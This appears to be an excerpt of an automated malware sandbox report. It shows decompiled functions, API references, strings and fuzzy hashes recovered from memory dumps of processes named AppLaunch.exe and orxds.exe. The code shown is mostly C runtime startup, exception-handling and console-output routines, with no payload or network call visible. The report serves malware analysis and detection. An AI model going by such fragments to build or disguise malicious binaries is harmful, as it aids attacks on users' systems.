Instruction ID: c1d28ec82e107c9024910f62fb74406015039795ff1139e17df5437d1bf62e25
Opcode Fuzzy Hash: 730a98a230b4d25041984cbc0c32c23882f73a2a52a4b1677c66f46a91612def
Instruction Fuzzy Hash: 2E512171600304ABDB24DF38C94579E7FE6AF89304F50962EFC4597281D7B9DA848BCA

Uniqueness

Uniqueness Score: -1.00%

Function 0041809E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 004180E1, 0041811E

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
API String ID: 0-448403072
Opcode ID: 549f3bcfde5244f4871942ead8448d2f8bdddd0e9c24185eaae1fb5dce747299
Instruction ID: d36e66f545824ca804fc8053fc630a4bbdae804a28a8c965339656ba13d9aa6b
Opcode Fuzzy Hash: 549f3bcfde5244f4871942ead8448d2f8bdddd0e9c24185eaae1fb5dce747299
Instruction Fuzzy Hash: F5417372A00618BBDB119B9ADC819EFBBF8EF85310F14016FF914E7351DA749A82C758

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB35 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0041E8DE: GetOEMCP.KERNEL32(00000000,0041EB50,?,?,BdA,00416442,?), ref: 0041E909

_free.LIBCMT ref: 0041EBAD

Strings

BdA, xrefs: 0041EB3D

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free
String ID: BdA
API String ID: 269201875-2350210841
Opcode ID: af5d5970c8d1db2a0a8e97a69e7df03e13bc6610ff7278fdde4fe277e86e66ee
Instruction ID: dde0c45b74e42a11158e88ee4a6f334abb21f81567eecd5436c50b5576c35a3a
Opcode Fuzzy Hash: af5d5970c8d1db2a0a8e97a69e7df03e13bc6610ff7278fdde4fe277e86e66ee
Instruction Fuzzy Hash: 2731DE75904249AFCF01DF6AD880ADA7BE4AF80314F15006BF8119B291EB39EC80CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00419153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00419181
_free.LIBCMT ref: 004191A7

Strings

P@C, xrefs: 004191C0

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free
String ID: P@C
API String ID: 269201875-2354161805
Opcode ID: 0c022580b5e46047273e3257fd6a31c985556c591599556947bb399249f9252e
Instruction ID: 7e2fc13560020531a2af8256f38dd64580a6055bc5c6248e04891097817f4845
Opcode Fuzzy Hash: 0c022580b5e46047273e3257fd6a31c985556c591599556947bb399249f9252e
Instruction Fuzzy Hash: 18119371E0071166E7249B29AC15BD63398BB41738F582637FA26DA2E0E778DCC2478D

Uniqueness

Uniqueness Score: -1.00%

Function 00413972 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004139B6
___raise_securityfailure.LIBCMT ref: 00413A9D

Strings

`VC, xrefs: 00413A98

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: `VC
API String ID: 3761405300-3030579402
Opcode ID: 88cca52f03d3994def1460f4c1c68c41a99f6ced113eff2d7c52e2e230f43919
Instruction ID: 896eb7b363f77d9f09391d49b58fd09572d27c93906a82c102befcc5e6cdfba7
Opcode Fuzzy Hash: 88cca52f03d3994def1460f4c1c68c41a99f6ced113eff2d7c52e2e230f43919
Instruction Fuzzy Hash: 7D21F0B8610B04DAE710DF15F982A547BE4FB48314FA4753AE5088B3B0E3B49580CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00413B26 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(E06D7363,00000001,00000003,< @,?,?,?,0040203C,?,0043310C), ref: 00413B86

Strings

< @, xrefs: 00413B31
< @, xrefs: 00413B73, 00413B76

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID: < @$< @
API String ID: 3997070919-1284050056
Opcode ID: 794ae15e6e0db31f4291640b4f98a2b51644340bbcec8a8c6aa1363c38b5e95a
Instruction ID: 0ad63414873f9063e310b4a06ccfcd64d21eb3c6bdbcdee7f5ad414051d72530
Opcode Fuzzy Hash: 794ae15e6e0db31f4291640b4f98a2b51644340bbcec8a8c6aa1363c38b5e95a
Instruction Fuzzy Hash: F0018F35A00209ABD7019F5CD894BEEBBB8FF48710F15405BE904AB3A1E774AE41CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00415E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 00415EBE

Part of subcall function 0041A868: GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,0041AA71), ref: 0041A8A1

Strings

PZA, xrefs: 00415E91
PZA, xrefs: 00415E92

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: CurrentDirectory__dosmaperr
String ID: PZA$PZA
API String ID: 4125400436-1952235168
Opcode ID: 5452fbf11968b411c1a532657a6425d2d0525fc4897d72563acfebefe6a954f6
Instruction ID: d086cddc0e12b9d26e490a5c56d3e7692402d825e2fa94f014aae7412e84f72b
Opcode Fuzzy Hash: 5452fbf11968b411c1a532657a6425d2d0525fc4897d72563acfebefe6a954f6
Instruction Fuzzy Hash: 97F0CD72914705D6DB24EF0680804EAF3B9EFE2765764845FE06CCB241E778DAC28799

Uniqueness

Uniqueness Score: -1.00%

Function 0041E8DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,0041EB50,?,?,BdA,00416442,?), ref: 0041E909
GetACP.KERNEL32(00000000,0041EB50,?,?,BdA,00416442,?), ref: 0041E920

Strings

BdA, xrefs: 0041E8E0

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID:
String ID: BdA
API String ID: 0-2350210841
Opcode ID: f44a37c09522bfef1b69cd337f9f7d8865e41a94d0d20ab1285a71c04382f6f6
Instruction ID: 96b3e8e4f5bc6eaa85a0a2fcf11f2aedbb4a0545bbbb59a037271787e00b6168
Opcode Fuzzy Hash: f44a37c09522bfef1b69cd337f9f7d8865e41a94d0d20ab1285a71c04382f6f6
Instruction Fuzzy Hash: 98F0F0B4514601CBDB10CB6AD808BED77B0AB00339F644399E8758A6E1D7B999C1CF49

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: orxds.exePID: 6188, Parent PID: 6060COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	1096
Total number of Limit Nodes:	5

Executed Functions

Function 0024F13B Relevance: 10.6, APIs: 7, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0024F13B() {
				int _t11;
				intOrPtr _t15;
				void* _t22;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t40;
				void* _t45;

				_push(0x10);
				_push(0x251b98);
				E0024F8A0(_t22, _t38, _t40);
				 *((intOrPtr*)(_t45 - 4)) = 0;
				_t37 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t39 = 0;
				while(1) {
					asm("lock cmpxchg [esi], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t37) {
						continue;
					} else {
						_t43 = 1;
						_t39 = 1;
					}
					L5:
					if( *0x2535b4 != _t43) {
						__eflags =  *0x2535b4;
						if(__eflags != 0) {
							 *0x252180 = _t43;
							goto L11;
						} else {
							 *0x2535b4 = _t43;
							_push(0x24102c);
							_push(0x24101c);
							L0024F88E();
							__eflags = 0;
							if(0 == 0) {
								goto L11;
							} else {
								 *((intOrPtr*)(_t45 - 4)) = 0xfffffffe;
								goto L23;
							}
						}
					} else {
						_push(0x1f);
						L0024F5E4();
						L11:
						if( *0x2535b4 == _t43) {
							_push(0x241018);
							_push(0x241000); // executed
							L0024F894(); // executed
							 *0x2535b4 = 2;
						}
						if(_t39 == 0) {
							 *0x2535b0 = 0;
						}
						_t55 =  *0x2535c0;
						if( *0x2535c0 != 0 && E0024F640(_t55, 0x2535c0) != 0) {
							_t43 =  *0x2535c0;
							 *0x2541d0(0, 2, 0);
							 *((intOrPtr*)( *0x2535c0))();
						}
						_t25 =  *0x252194; // 0x495ccd8
						_t11 = __imp____winitenv;
						 *_t11 = _t25;
						_push( *0x252194);
						E00248F5F( *0x25218c,  *0x252190); // executed
						 *0x252184 = _t11;
						if( *0x252188 != 0) {
							__eflags =  *0x252180;
							if( *0x252180 == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t45 - 4)) = 0xfffffffe;
							L23:
							return E0024F8E8(0, _t39, _t43);
						} else {
							exit(_t11);
							_t26 =  *((intOrPtr*)(_t45 - 0x14));
							_t15 =  *((intOrPtr*)( *_t26));
							 *((intOrPtr*)(_t45 - 0x20)) = _t15;
							_push(_t26);
							_push(_t15);
							L0024F5DE();
							return _t15;
						}
					}
				}
				_t43 = 1;
				__eflags = 1;
				goto L5;
			}

0x0024f13b
0x0024f13d
0x0024f142
0x0024f149
0x0024f152
0x0024f155
0x0024f15c
0x0024f160
0x0024f166
0x00000000
0x00000000
0x0024f16a
0x00000000
0x0024f16c
0x0024f16e
0x0024f16f
0x0024f16f
0x0024f176
0x0024f17c
0x0024f188
0x0024f18e
0x0024f1bc
0x00000000
0x0024f190
0x0024f190
0x0024f196
0x0024f19b
0x0024f1a0
0x0024f1a7
0x0024f1a9
0x00000000
0x0024f1ab
0x0024f1ab
0x00000000
0x0024f1b2
0x0024f1a9
0x0024f17e
0x0024f17e
0x0024f180
0x0024f1c2
0x0024f1c8
0x0024f1ca
0x0024f1cf
0x0024f1d4
0x0024f1db
0x0024f1db
0x0024f1e7
0x0024f1f0
0x0024f1f0
0x0024f1f2
0x0024f1f9
0x0024f20e
0x0024f216
0x0024f21c
0x0024f21c
0x0024f21e
0x0024f224
0x0024f229
0x0024f22b
0x0024f23d
0x0024f245
0x0024f251
0x0024f289
0x0024f290
0x0024f292
0x0024f298
0x0024f29d
0x0024f2a4
0x0024f2a9
0x0024f253
0x0024f254
0x0024f25a
0x0024f25f
0x0024f261
0x0024f264
0x0024f265
0x0024f266
0x0024f26d
0x0024f26d
0x0024f251
0x0024f17c
0x0024f175
0x0024f175
0x00000000

APIs

_amsg_exit.MSVCR120_CLR0400 ref: 0024F180
_initterm_e.MSVCR120_CLR0400 ref: 0024F1A0
_initterm.MSVCR120_CLR0400 ref: 0024F1D4
__IsNonwritableInCurrentImage.LIBCMT ref: 0024F200
exit.MSVCR120_CLR0400 ref: 0024F254
_XcptFilter.MSVCR120_CLR0400 ref: 0024F266

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: CurrentFilterImageNonwritableXcpt_amsg_exit_initterm_initterm_eexit
String ID:
API String ID: 3071723359-0
Opcode ID: e8b66dd8e8cce6f2f7ab2ae7bfa295955ffa9faf2c295a5a6ddeed8014036811
Instruction ID: 124b98529ad282d3a94681e38d0532784ee2ea2b7fd38a6928a4208aa18876a6
Opcode Fuzzy Hash: e8b66dd8e8cce6f2f7ab2ae7bfa295955ffa9faf2c295a5a6ddeed8014036811
Instruction Fuzzy Hash: 04310275620B02DFC76DEF24FE0961677A0E789322F505039E90D872E1EB7049B4DA48

Uniqueness

Uniqueness Score: -1.00%

Function 002499F3 Relevance: 9.1, APIs: 6, Instructions: 125
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E002499F3(void* __ecx, void* __edx) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v532;
				short _v8724;
				int _v8728;
				int _v8732;
				long _v8736;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				signed int _t32;
				short* _t34;
				intOrPtr _t35;
				void _t42;
				intOrPtr _t49;
				void* _t50;
				void* _t52;
				signed int _t54;
				void* _t55;
				intOrPtr* _t57;
				void* _t62;
				void* _t68;
				intOrPtr* _t69;
				void* _t76;
				void* _t79;
				void* _t80;
				int _t81;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				signed int _t87;

				E0024FBE0(0x2214);
				_t31 =  *0x252018; // 0x199a43ea
				_t32 = _t31 ^ _t87;
				_v20 = _t32;
				 *[fs:0x0] =  &_v16;
				_t81 = 0;
				_v8732 = 0;
				_v8728 = 0;
				_v8 = 3;
				_t34 =  &_v8724;
				__imp___vsnwprintf_s(_t34, 0x1000, 0xffffffff, __ecx, __edx, _t32, _t80, _t84, _t52,  *[fs:0x0], E00250070, 0xffffffff);
				if(_t34 == 0xffffffff) {
					_push(0x100);
					_t68 = 0xc;
					if(E002498B0(_t68,  &_v532) != 0) {
						_t69 =  &_v532;
						_t79 = _t69 + 2;
						do {
							_t49 =  *_t69;
							_t69 = _t69 + 2;
						} while (_t49 != 0);
						_t50 = (_t69 - _t79 >> 1) + 1;
						__imp__wcscpy_s( &_v532 - _t50 + _t50, _t50,  &_v532);
					}
				}
				_t57 =  &_v8724;
				_t76 = _t57 + 2;
				do {
					_t35 =  *_t57;
					_t57 = _t57 + 2;
				} while (_t35 != 0);
				_t54 = ((_t57 - _t76 >> 1) + 1) * 3;
				_t85 = E00249EED(_t54, _t76);
				_v8732 = _t85;
				if(_t85 != 0) {
					_t81 = 1;
					_v8728 = 1;
				}
				_t18 = _t54 - 1; // -1
				WideCharToMultiByte(GetConsoleOutputCP(), 0,  &_v8724, 0xffffffff, _t85, _t18, 0, 0);
				_t62 = _t85;
				_t20 = _t62 + 1; // 0x1
				_t77 = _t20;
				do {
					_t42 =  *_t62;
					_t62 = _t62 + 1;
				} while (_t42 != 0);
				WriteFile(GetStdHandle(0xfffffff5), _t85, _t62 - _t77,  &_v8736, 0); // executed
				_v8 = _v8 | 0xffffffff;
				if(_t81 != 0) {
					if(_t85 != 0) {
						_t77 = _t85;
						E00249EC7(_t85);
					}
					_v8728 = _v8728 & 0x00000000;
				}
				 *[fs:0x0] = _v16;
				_pop(_t82);
				_pop(_t86);
				_pop(_t55);
				return E0024F2C0(_t55, _v20 ^ _t87, _t77, _t82, _t86);
			}

0x00249a09
0x00249a0e
0x00249a13
0x00249a15
0x00249a1f
0x00249a27
0x00249a29
0x00249a2f
0x00249a35
0x00249a3c
0x00249a4c
0x00249a58
0x00249a5a
0x00249a67
0x00249a6f
0x00249a71
0x00249a77
0x00249a7a
0x00249a7a
0x00249a7d
0x00249a80
0x00249a89
0x00249a9f
0x00249aa5
0x00249a6f
0x00249aa8
0x00249aae
0x00249ab1
0x00249ab1
0x00249ab4
0x00249ab7
0x00249ac3
0x00249acd
0x00249acf
0x00249ad7
0x00249adb
0x00249adc
0x00249adc
0x00249ae4
0x00249afc
0x00249b02
0x00249b04
0x00249b04
0x00249b07
0x00249b07
0x00249b09
0x00249b0a
0x00249b24
0x00249b2a
0x00249b30
0x00249b34
0x00249b36
0x00249b38
0x00249b38
0x00249b3d
0x00249b3d
0x00249b47
0x00249b4f
0x00249b50
0x00249b51
0x00249b5f

APIs

_vsnwprintf_s.MSVCR120_CLR0400 ref: 00249A4C
wcscpy_s.MSVCR120_CLR0400 ref: 00249A9F
GetConsoleOutputCP.KERNEL32(00000000,?,000000FF,00000000,-00000001,00000000,00000000,?,00248C4B), ref: 00249AF5
WideCharToMultiByte.KERNEL32(00000000,?,00248C4B), ref: 00249AFC
GetStdHandle.KERNEL32(000000F5,00000000,00000001,?,00000000,?,00248C4B), ref: 00249B1D
WriteFile.KERNELBASE(00000000,?,00248C4B), ref: 00249B24

Part of subcall function 002498B0: LoadStringW.USER32(00000000,0000000C,?,00249A6D), ref: 002498C2
Part of subcall function 002498B0: LoadLibraryExW.KERNEL32(mscoree.dll,00000000,00000000,?,00000000,?,00249A6D,00000100,?,00248C4B), ref: 002498D3
Part of subcall function 002498B0: FreeLibrary.KERNEL32(00000000,00249A6D,?,?,00000000,?,00249A6D,00000100,?,00248C4B), ref: 002498F5

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: LibraryLoad$ByteCharConsoleFileFreeHandleMultiOutputStringWideWrite_vsnwprintf_swcscpy_s
String ID:
API String ID: 348151980-0
Opcode ID: d620fcf929cd807855b5e8bf13bcaf34f9001421aa8d6b176bc7d0e2a4f1e971
Instruction ID: 3c7f99621bdc3380c14eb8c076c0a9410e6868fad4ef41bcfb95b8f86fae13e2
Opcode Fuzzy Hash: d620fcf929cd807855b5e8bf13bcaf34f9001421aa8d6b176bc7d0e2a4f1e971
Instruction Fuzzy Hash: C4412371900219AFDB28DF68DC89FBBB768EB54324F14079DE92A871C0E7715A91CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00248F5F Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00248F5F(intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v28;
				int _v32;
				void* _v36;
				void* _t22;
				void* _t25;
				void* _t33;

				_v28 = 1;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t33 = E00248A34( &_v28, _a4 - 1, _a8 + 4);
				E00248ECE(_t25);
				if(_t33 == 0) {
					_t22 = E00248C5F(_t25,  &_v28, 0, _t33, __eflags,  &_v32);
					__eflags = _t22;
					if(_t22 < 0) {
						E00248EB0(_t25, 0, _t33, _t22);
					}
					exit(_v32);
					L3:
					L4:
					exit(0);
					goto L3;
				}
				E00248F0C();
				if(_t33 >= 0) {
					goto L4;
				}
				exit(0xffffffff);
				goto L3;
			}

0x00248f74
0x00248f80
0x00248f85
0x00248f89
0x00248f8d
0x00248f91
0x00248f9e
0x00248fa0
0x00248fa7
0x00248fc6
0x00248fcb
0x00248fcd
0x00248fd4
0x00248fd4
0x00248fb4
0x00248fb4
0x00248fba
0x00248fb4
0x00000000
0x00248fb4
0x00248fa9
0x00248fb0
0x00000000
0x00000000
0x00248fb4
0x00000000

APIs

exit.MSVCR120_CLR0400 ref: 00248FB4

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: exit
String ID:
API String ID: 2483651598-0
Opcode ID: a34e0da13b1268710aadd17855cea16e1c88d263b0d3b0f7168ac9f94c7a451d
Instruction ID: d15fc1d6a275d8cf4930f31ac593b8916cbda053c5512241510acc9f89312c0d
Opcode Fuzzy Hash: a34e0da13b1268710aadd17855cea16e1c88d263b0d3b0f7168ac9f94c7a451d
Instruction Fuzzy Hash: 9D0192718383519BC709EF55C84595FFBE8AEA4314F014609F8A592190EF70E518CB92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0024915E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0024915E(void* __ecx, CHAR* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t11;
				void* _t16;
				intOrPtr* _t17;
				struct HINSTANCE__* _t23;
				CHAR* _t26;

				_t21 = __edx;
				_t26 = __edx;
				_t23 = LoadLibraryExW(L"user32", 0, 0);
				if(_t23 == 0) {
					_t5 = L"<null>";
					if(_t26 == 0) {
						_t26 = L"<null>";
					}
					E002490DA(_t16, _t21, _t23, _t26, L"**** MessageBox invoked, title \'%s\' ****\n", _t5);
					E002490DA(_t16, _t21, _t23, _t26, L"  %s\n", _t26);
					E002490DA(_t16, _t21, _t23, _t26);
					E002490DA(_t16, _t21, _t23, _t26, "\n", L"********\n");
					if(IsDebuggerPresent() != 0) {
						DebugBreak();
					}
					_t11 = 2;
				} else {
					_push(_t16);
					_v8 = 2;
					_t17 = GetProcAddress(_t23, "MessageBoxW");
					if(_t17 != 0) {
						 *0x2541d0(0, _t26, 0, 0x10);
						_v8 =  *_t17();
					}
					FreeLibrary(_t23);
					_t11 = _v8;
				}
				return _t11;
			}

0x0024915e
0x0024916d
0x00249175
0x00249179
0x002491b6
0x002491bd
0x002491bf
0x002491bf
0x002491c7
0x002491d2
0x002491dc
0x002491e6
0x002491f6
0x002491f8
0x002491f8
0x00249200
0x0024917b
0x0024917b
0x00249182
0x0024918f
0x00249193
0x0024919e
0x002491a6
0x002491a6
0x002491aa
0x002491b0
0x002491b3
0x00249206

APIs

LoadLibraryExW.KERNEL32(user32,00000000,00000000,?,?,?,?,0024999F,?,?), ref: 0024916F
GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 00249189
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,0024999F), ref: 002491AA
IsDebuggerPresent.KERNEL32(?,?,?,0024999F,?,?), ref: 002491EE
DebugBreak.KERNEL32(?,?,?,0024999F,?,?), ref: 002491F8

Strings

MessageBoxW, xrefs: 0024917C
user32, xrefs: 00249168
<null>, xrefs: 002491B6, 002491C1, 002491CC
**** MessageBox invoked, title '%s' ****, xrefs: 002491C2
********, xrefs: 002491D7
%s, xrefs: 002491CD

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: Library$AddressBreakDebugDebuggerFreeLoadPresentProc
String ID: %s$**** MessageBox invoked, title '%s' ****$********$<null>$MessageBoxW$user32
API String ID: 2820363182-3536105985
Opcode ID: 8b71c5dafe38f6812126336355b67943742e02ceba6561c4e6778461eccf5307
Instruction ID: 0cdb0fb2ac5b34e3e494e35fb5d50122cfa5c1cea4d4850b6ea4d1bd2632c456
Opcode Fuzzy Hash: 8b71c5dafe38f6812126336355b67943742e02ceba6561c4e6778461eccf5307
Instruction Fuzzy Hash: 800108317A030177E3287BA96C0EF6BB9689B92B22F100114FE09A21C1CAB14CF08565

Uniqueness

Uniqueness Score: -1.00%

Function 0024F580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0024F580(intOrPtr* _a4) {
				intOrPtr* _t5;
				intOrPtr _t7;

				_t5 =  *_a4;
				if( *_t5 != 0xe06d7363 ||  *((intOrPtr*)(_t5 + 0x10)) != 3) {
					L6:
					return 0;
				} else {
					_t7 =  *((intOrPtr*)(_t5 + 0x14));
					if(_t7 == 0x19930520 || _t7 == 0x19930521 || _t7 == 0x19930522 || _t7 == 0x1994000) {
						L0024FA46();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(E0024F580);
						L0024FA4C();
						return 0;
					} else {
						goto L6;
					}
				}
			}

0x0024f586
0x0024f58e
0x0024f5b5
0x0024f5b8
0x0024f596
0x0024f596
0x0024f59e
0x0024f5bb
0x0024f5c0
0x0024f5c1
0x0024f5c2
0x0024f5c3
0x0024f5c4
0x0024f5c5
0x0024f5c6
0x0024f5c7
0x0024f5c8
0x0024f5c9
0x0024f5ca
0x0024f5cb
0x0024f5cc
0x0024f5cd
0x0024f5ce
0x0024f5cf
0x0024f5d0
0x0024f5d5
0x0024f5dd
0x00000000
0x00000000
0x00000000
0x0024f59e

APIs

?terminate@@YAXXZ.MSVCR120_CLR0400 ref: 0024F5BB
__crtSetUnhandledExceptionFilter.MSVCR120_CLR0400(0024F580), ref: 0024F5D5

Strings

